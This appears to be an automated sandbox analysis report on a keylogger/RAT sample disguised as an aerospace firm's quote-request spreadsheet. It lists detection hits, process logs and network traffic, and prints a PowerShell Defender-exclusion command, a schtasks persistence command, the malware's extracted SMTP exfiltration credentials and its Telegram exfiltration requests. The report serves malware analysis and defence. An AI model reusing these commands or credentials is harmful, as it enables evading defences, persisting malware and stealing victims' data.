0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13c8e0:$a1: get_encryptedPassword 0x17f900:$a1: get_encryptedPassword 0x1c2720:$a1: get_encryptedPassword 0x13ce68:$a2: get_encryptedUsername 0x17fe88:$a2: get_encryptedUsername 0x1c2ca8:$a2: get_encryptedUsername 0x13c553:$a3: get_timePasswordChanged 0x17f573:$a3: get_timePasswordChanged 0x1c2393:$a3: get_timePasswordChanged 0x13c66a:$a4: get_passwordField 0x17f68a:$a4: get_passwordField 0x1c24aa:$a4: get_passwordField 0x13c8f6:$a5: set_encryptedPassword 0x17f916:$a5: set_encryptedPassword 0x1c2736:$a5: set_encryptedPassword 0x13f612:$a6: get_passwords 0x182632:$a6: get_passwords 0x1c5452:$a6: get_passwords 0x13f9a6:$a7: get_logins 0x1829c6:$a7: get_logins 0x1c57e6:$a7: get_logins
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb52c0:$a1: get_encryptedPassword 0xf82e0:$a1: get_encryptedPassword 0x13b100:$a1: get_encryptedPassword 0xb5848:$a2: get_encryptedUsername 0xf8868:$a2: get_encryptedUsername 0x13b688:$a2: get_encryptedUsername 0xb4f33:$a3: get_timePasswordChanged 0xf7f53:$a3: get_timePasswordChanged 0x13ad73:$a3: get_timePasswordChanged 0xb504a:$a4: get_passwordField 0xf806a:$a4: get_passwordField 0x13ae8a:$a4: get_passwordField 0xb52d6:$a5: set_encryptedPassword 0xf82f6:$a5: set_encryptedPassword 0x13b116:$a5: set_encryptedPassword 0xb7ff2:$a6: get_passwords 0xfb012:$a6: get_passwords 0x13de32:$a6: get_passwords 0xb8386:$a7: get_logins 0xfb3a6:$a7: get_logins 0x13e1c6:$a7: get_logins
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13dca4:$s1: UnHook 0x180cc4:$s1: UnHook 0x1c3ae4:$s1: UnHook 0x13dcab:$s2: SetHook 0x180ccb:$s2: SetHook 0x1c3aeb:$s2: SetHook 0x13dcb3:$s3: CallNextHook 0x180cd3:$s3: CallNextHook 0x1c3af3:$s3: CallNextHook 0x13dcc0:$s4: _hook 0x180ce0:$s4: _hook 0x1c3b00:$s4: _hook
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb6684:$s1: UnHook 0xf96a4:$s1: UnHook 0x13c4c4:$s1: UnHook 0xb668b:$s2: SetHook 0xf96ab:$s2: SetHook 0x13c4cb:$s2: SetHook 0xb6693:$s3: CallNextHook 0xf96b3:$s3: CallNextHook 0x13c4d3:$s3: CallNextHook 0xb66a0:$s4: _hook 0xf96c0:$s4: _hook 0x13c4e0:$s4: _hook
Click to see the 43 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", ParentImage: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ParentProcessId: 3948, ParentProcessName: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", ProcessId: 4148, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmpECA5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmpECA5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WheTgQY.exe, ParentImage: C:\Users\user\AppData\Roaming\WheTgQY.exe, ParentProcessId: 5456, ParentProcessName: WheTgQY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmpECA5.tmp", ProcessId: 7320, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", ParentImage: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ParentProcessId: 3948, ParentProcessName: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp", ProcessId: 5732, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", ParentImage: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ParentProcessId: 3948, ParentProcessName: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", ProcessId: 4148, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe", ParentImage: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ParentProcessId: 3948, ParentProcessName: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp", ProcessId: 5732, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T10:38:20.969314+0100	2803305	3	Unknown Traffic	192.168.2.5	49710	104.21.80.1	443	TCP
2025-02-19T10:38:23.373519+0100	2803305	3	Unknown Traffic	192.168.2.5	49717	104.21.80.1	443	TCP
2025-02-19T10:38:24.862896+0100	2803305	3	Unknown Traffic	192.168.2.5	49721	104.21.80.1	443	TCP
2025-02-19T10:38:29.654879+0100	2803305	3	Unknown Traffic	192.168.2.5	49734	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T10:38:19.404304+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49707	132.226.8.169	80	TCP
2025-02-19T10:38:20.370820+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49707	132.226.8.169	80	TCP
2025-02-19T10:38:21.904132+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49712	132.226.8.169	80	TCP
2025-02-19T10:38:21.935499+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49711	132.226.8.169	80	TCP
2025-02-19T10:38:22.935405+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49711	132.226.8.169	80	TCP
2025-02-19T10:38:24.287539+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49719	132.226.8.169	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T10:38:32.009238+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49742	149.154.167.220	443	TCP
2025-02-19T10:38:34.712283+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49749	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587"}
Source: 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Virustotal: Detection: 36%			Perma Link

Multi AV Scanner detection for submitted file

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	ReversingLabs: Detection: 35%
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Virustotal: Detection: 36%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack	String decryptor: royals@htcp.homes
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack	String decryptor: 7213575aceACE@@
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack	String decryptor: mail.htcp.homes
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack	String decryptor: royal@htcp.homes
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack	String decryptor: 587
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49708 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49714 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: tsUY.pdbSHA256 source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, WheTgQY.exe.0.dr
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2064388302.00000000071CF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tsUY.pdb source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, WheTgQY.exe.0.dr

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 077C1F0Ah	0_2_077C2155
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 077C1F0Ah	0_2_077C27CB
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 0111F8E9h	10_2_0111F630
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 0111FD41h	10_2_0111FA88
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055DE959h	10_2_055DE6B0
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055DD7F9h	10_2_055DD550
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055D31E0h	10_2_055D2DC8
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055D31E0h	10_2_055D2DC2
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055DCF49h	10_2_055DCCA0
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055DF209h	10_2_055DEF60
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055DE0A9h	10_2_055DDE00
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055D2C19h	10_2_055D2968
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055D31E0h	10_2_055D310E
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055DDC51h	10_2_055DD9A8
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_055D0040
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055DFAB9h	10_2_055DF810
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055DD3A1h	10_2_055DD0F8
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055DEDB1h	10_2_055DEB08
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055D0D0Dh	10_2_055D0B30
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055D1697h	10_2_055D0B30
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055DF661h	10_2_055DF3B8
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 4x nop then jmp 055DE501h	10_2_055DE258
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 00DAF8E9h	16_2_00DAF631
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 00DAFD41h	16_2_00DAFA88
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 0651E0A9h	16_2_0651DE00
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 065131E0h	16_2_06512DC8
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 06510D0Dh	16_2_06510B30
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 06511697h	16_2_06510B30
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 06512C19h	16_2_06512968
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 0651E959h	16_2_0651E6B0
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 0651F209h	16_2_0651EF60
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 0651CF49h	16_2_0651CCA0
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 0651D7F9h	16_2_0651D550
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 065131E0h	16_2_06512DBE
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 0651E501h	16_2_0651E258
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 0651EDB1h	16_2_0651EB08
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 0651F661h	16_2_0651F3B8
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	16_2_06510040
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 0651FAB9h	16_2_0651F810
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 0651D3A1h	16_2_0651D0F8
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 065131E0h	16_2_0651310E
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 4x nop then jmp 0651DC51h	16_2_0651D9A8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49749 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49742 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2019/02/2025%20/%2018:31:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2019/02/2025%20/%2018:02:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
